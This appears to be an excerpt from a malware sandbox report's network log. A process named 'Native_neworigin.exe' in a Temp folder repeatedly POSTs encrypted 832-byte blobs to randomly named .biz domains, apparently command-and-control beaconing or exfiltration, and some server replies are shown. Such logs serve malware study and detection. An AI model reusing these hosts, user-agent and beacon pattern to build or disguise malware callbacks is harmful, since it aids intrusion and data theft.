                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.709494114 CET832OUTData Raw: fe c0 b7 ce 83 a7 dd 07 34 03 00 00 00 2f d2 b3 3a cb 1d 3a 02 c4 ee 01 70 8a 43 f2 9e 61 d3 7b 86 76 9b 6f 90 92 53 25 d9 58 3c b0 e4 31 19 09 d2 aa 30 cd 30 40 e8 d7 e3 85 94 00 9b 8f c9 74 f5 dd a9 46 c4 5a 15 4f a3 f2 c1 79 23 f4 94 4b f9 81
                                                                                                                                                                                                                                                                                                                                Data Ascii: 4/::pCa{voS%X<100@tFZOy#K+npla,Twfs/*o;f#no8c\2#7W&""sxo(+kr-xg80~N!_7Psd<J;`^PMUjj[Gb;j


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                25192.168.2.54995082.112.184.197802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.818851948 CET355OUTPOST /bqdrapkxlqcka HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:32.818862915 CET832OUTData Raw: 4c 05 b1 96 da 26 28 e3 34 03 00 00 b7 40 85 8e e4 b4 09 41 f8 86 bd 70 bc bb 3e 7e e7 48 d1 e9 71 40 cc bf 27 86 a6 1e f6 e3 28 17 a1 8f 90 25 b9 36 d4 d8 12 5f 6b 56 6e b4 a2 fa 02 54 ad b2 b7 18 06 15 f5 da df 45 d3 3e 61 c0 74 9a 0d 34 e8 38
                                                                                                                                                                                                                                                                                                                                Data Ascii: L&(4@Ap>~Hq@'(%6_kVnTE>at48+]r~;$6V.Z!#5lVY6[<i{XySsNgmJnW*<:#Ggn:L3o)DyA?#;B


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                26192.168.2.55000582.112.184.197802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:41.069530010 CET347OUTPOST /ga HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:41.069550991 CET832OUTData Raw: 7c 4e e9 d2 20 8b f6 9e 34 03 00 00 95 b2 5c b7 4a 1f 51 2c bd a2 2b 61 94 5c 4c 66 c8 f7 54 ba 2f 07 c9 2a df cb fe 31 6d 23 ea 9a 67 2b 76 4f 5f db 9b 98 c9 80 e9 eb c3 97 53 e6 67 6e 71 34 47 0b 2c a7 ed db a7 ed 4a e1 96 d5 f6 a1 b1 31 2a 0c
                                                                                                                                                                                                                                                                                                                                Data Ascii: |N 4\JQ,+a\LfT/*1m#g+vO_Sgnq4G,J1*hSurQw-*z)_(_@omfES)b?cr9duQ_3)(\k5(1\pGS<:0,&K7N}`q]\ hcCrGOMZ


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                27192.168.2.55001082.112.184.197802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:02.903178930 CET350OUTPOST /mshka HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:02.903198004 CET832OUTData Raw: 74 f0 d4 4a f5 7e 35 4a 34 03 00 00 73 f4 14 4b 40 8c f1 10 54 db 23 bb ac b2 b2 bd 8f cc 08 80 72 d6 e3 7e c9 a1 9c 8c 55 39 90 c4 85 7f c1 bb 87 de 7c 41 30 e7 93 38 9e cd 74 29 97 bd 3b 36 98 33 b9 0c cc 3f 6d d4 c3 f1 dd 50 7b 16 8f b9 cc 3f
                                                                                                                                                                                                                                                                                                                                Data Ascii: tJ~5J4sK@T#r~U9|A08t);63?mP{?/HG:@WZ"&fujs?X7rXqeF6Frjt&7MTwv_;GUW)\\{ErgqV6+y5 Pf1!VCN%A:j%


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                28192.168.2.55001147.129.31.212802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:24.479659081 CET355OUTPOST /mvnulpmrxwqe HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:24.479702950 CET832OUTData Raw: 32 ff 28 ad 0e 4d da 05 34 03 00 00 c1 8f e2 6e bd 97 16 3f 86 04 3e 72 0f 53 d2 04 06 33 24 f3 05 12 d5 ac 4d 02 fb ee 39 59 2b 42 b8 49 b4 45 c8 83 56 fa 0f fa c1 66 bf 6b 1d 17 68 2b 92 9a e0 da d3 53 a5 87 7d 63 32 6d ed d5 62 6b 13 b8 6a 59
                                                                                                                                                                                                                                                                                                                                Data Ascii: 2(M4n?>rS3$M9Y+BIEVfkh+S}c2mbkjY{2F-aL<aspT:A(|)_kukt<+[u?jYzb%XV_(;0vN$G\M8)eD!)m?~<f(M|6nkDI#
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:25.945547104 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:25 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=0d53807a14404a912b44b1e9e3367df5|8.46.123.75|1732094785|1732094785|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                29192.168.2.55001213.251.16.150802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:26.493447065 CET348OUTPOST /ueacef HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:26.493489027 CET832OUTData Raw: a4 36 12 b7 49 82 b5 78 34 03 00 00 a9 30 b2 d6 ba 2c 31 d3 47 ae e6 d6 c5 0c 0c 96 c5 28 dd 34 09 f8 97 ef 73 47 4e f3 94 45 65 13 f0 87 80 1a 8c 0d 3f 02 3e 41 62 85 61 a9 da d1 95 ed ed c8 f9 14 71 ae 21 c5 bb 43 cf ab 56 29 09 26 18 a5 a7 40
                                                                                                                                                                                                                                                                                                                                Data Ascii: 6Ix40,1G(4sGNEe?>Abaq!CV)&@xk<>N'ito-.3,6?Hlxjd8fpG1;5:|)nT34_,^a8n?c*0;h~PI07oN#vD+~J
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:27.946568966 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=5ae8f3a7a028cc10158c7e0a496ce817|8.46.123.75|1732094787|1732094787|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                30192.168.2.55001344.221.84.105802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.015208960 CET361OUTPOST /qologlfowpsjwwtq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.015237093 CET832OUTData Raw: b0 63 33 7a 36 3b af 3c 34 03 00 00 59 f7 26 83 bd df 82 21 e9 26 09 70 bf 2b af 0d bd 8b 05 bd a0 47 98 33 44 8f 0f 91 3f 17 c4 08 53 44 92 81 32 26 59 60 cf c4 d2 d2 d6 cf 2a d5 ce 0e f9 be 45 c0 db b7 68 f3 8b 8b a6 b8 ab 9b d5 b2 24 f9 a3 17
                                                                                                                                                                                                                                                                                                                                Data Ascii: c3z6;<4Y&!&p+G3D?SD2&Y`*Eh$:(ReTkN3Qs#:MR9yiwEcvlP(HX]gJ3"m3k_&lbh+o9Q6##I>Y-$%t+F@<S3$i
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.502311945 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=4e75cd09a21e76c1fbdeb5478f1a6ba5|8.46.123.75|1732094788|1732094788|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                31192.168.2.55001418.141.10.107802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:29.286969900 CET345OUTPOST /cr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:29.286969900 CET832OUTData Raw: a8 29 04 0d 16 be ee 99 34 03 00 00 2d 89 77 48 bb 8c c3 25 48 e8 b9 04 0d a4 be fc 2c 1f aa 03 db 9d ae 7f c8 c3 7c dd 64 86 37 ee ff 50 ba 40 07 0b 84 1e 0b 08 bd 03 17 4d 66 df 47 6d 58 a2 ba 80 af c4 6e 01 ba b8 e6 12 43 ab fe 3e b3 5b 70 db
                                                                                                                                                                                                                                                                                                                                Data Ascii: )4-wH%H,|d7P@MfGmXnC>[p~GVz26?a~`cG'#uz6xGgYN&_JJ-d,(sJ_7{fxP`<U(K\_,!MSUv5I'8NV
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:30.666176081 CET409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:30 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=4447dbbe3548ccb8498dbdaf48dcdbaa|8.46.123.75|1732094790|1732094790|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                32192.168.2.550015172.234.222.143802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:30.832493067 CET354OUTPOST /oiqbeltfrlpts HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:30.832518101 CET832OUTData Raw: 67 e5 be aa 30 a9 4a b4 34 03 00 00 36 16 ab a8 a7 51 9d 75 bd 38 0d 8c dd 3a 17 cf 69 4f 17 0f 3b 36 f3 90 b6 98 a9 11 44 87 84 a7 1d 41 db 1d 7f c5 60 96 bb 3c a9 f6 ea be 98 82 fe cc 4b 27 f7 ae eb 48 c3 95 86 13 b1 e8 2e cd 34 b9 ca 98 f8 18
                                                                                                                                                                                                                                                                                                                                Data Ascii: g0J46Qu8:iO;6DA`<K'H.4X0U2y^-tdn3bS~[<?<-PQBr8,]`4#V!wv[v8NnyWmaM=?Fi<UDd&<b',s


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                33192.168.2.550016172.234.222.143802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:31.354562998 CET351OUTPOST /jwvwqanfys HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:31.354581118 CET832OUTData Raw: 39 e3 63 de 29 02 7b 71 34 03 00 00 2a 45 f5 47 84 03 46 f6 7f 02 6f 7c d5 fc 16 80 d3 39 76 cc 04 1d 58 fb e0 8f b2 fb d1 a3 48 f9 4c cf 78 1f 96 9f b6 f9 42 1f 49 39 8a 67 f9 ee b6 90 71 fa ab 3a 86 c9 bd 2b 24 94 d6 ef 85 78 52 e7 2d 7c ee c1
                                                                                                                                                                                                                                                                                                                                Data Ascii: 9c){q4*EGFo|9vXHLxBI9gq:+$xR-|V~OB=@AW\]#O?c"gC,m&2_yoMAF>CF_f+\,$:lY@v\=.NEG+BT&K`Jf"P6$%


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                34192.168.2.55001734.246.200.160802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:32.153145075 CET352OUTPOST /rheljawehu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:32.153245926 CET832OUTData Raw: d3 33 57 91 a5 11 06 eb 34 03 00 00 53 08 8d 0c 00 55 ca 84 89 ef 43 d3 6e e2 2c 7d b8 0a 85 d1 d1 43 24 dd 3d b8 f0 3f 32 97 3b c3 43 8a 3f e4 d5 83 77 f4 be 87 cf a4 71 69 b4 19 fb 21 90 75 a8 3a ed b8 9f 9f a0 19 40 56 c3 de 34 9d f7 2b e8 46
                                                                                                                                                                                                                                                                                                                                Data Ascii: 3W4SUCn,}C$=?2;C?wqi!u:@V4+F]sdE/uYEhiJOR(U{faUP]NR|iAu8xYI'w0GSFLG,>'iT*.^oJ G,TNn)tKA_+S=
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:32.896600008 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:32 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=2b5c0abc6eeaf2397d4cfdb4c50c4d4a|8.46.123.75|1732094792|1732094792|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                35192.168.2.55001818.208.156.248802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:33.089867115 CET344OUTPOST /jlc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:33.089900970 CET832OUTData Raw: 9a b1 96 1c d8 ec 4e fc 34 03 00 00 f5 97 24 dd 2a 67 f5 55 ba f9 72 1b 65 b4 ab e6 55 04 c6 cf 5a 4a 99 db 5f 23 64 9a 36 0f 58 f6 fa 15 0a 94 bd 87 20 ab e5 4a eb 94 c7 75 14 e8 ba 35 a0 36 b6 23 10 df 88 6f 19 e2 06 96 e2 b6 b9 63 97 b0 b5 51
                                                                                                                                                                                                                                                                                                                                Data Ascii: N4$*gUreUZJ_#d6X Ju56#ocQ,D<JCpm5hHJTLHUZx`JQP9Mzi}rxc#Vaz%.!M"x ?*@m/~kE/^g0c;(jyVRHg-L
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:33.588474035 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:33 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=f27689d4fbaf94fdfa3893c74535a811|8.46.123.75|1732094793|1732094793|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                36192.168.2.550019208.100.26.245802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:33.725439072 CET346OUTPOST /iq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:33.725466013 CET832OUTData Raw: bc 3c 43 c6 e2 54 a0 02 34 03 00 00 9a d3 6f d0 79 2f ae 92 f0 4a 2e 18 fb 1c 91 9c 27 14 93 31 0f 08 a2 b8 04 cb fc 77 7a bf 84 9c db 61 02 76 e7 e2 d1 58 12 b7 0a 48 1e 6c 51 52 be f9 50 87 7c 4c 19 e4 81 f9 ac a6 d5 00 d1 a6 64 06 0a c0 00 8d
                                                                                                                                                                                                                                                                                                                                Data Ascii: <CT4oy/J.'1wzavXHlQRP|LdATksNk/.B$WXB,v OSv4dU.hNXt7o\hmEH]7&ecXqWT@huQWEspGyx}$=9
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:34.231839895 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:26:34 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Content-Length: 580
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
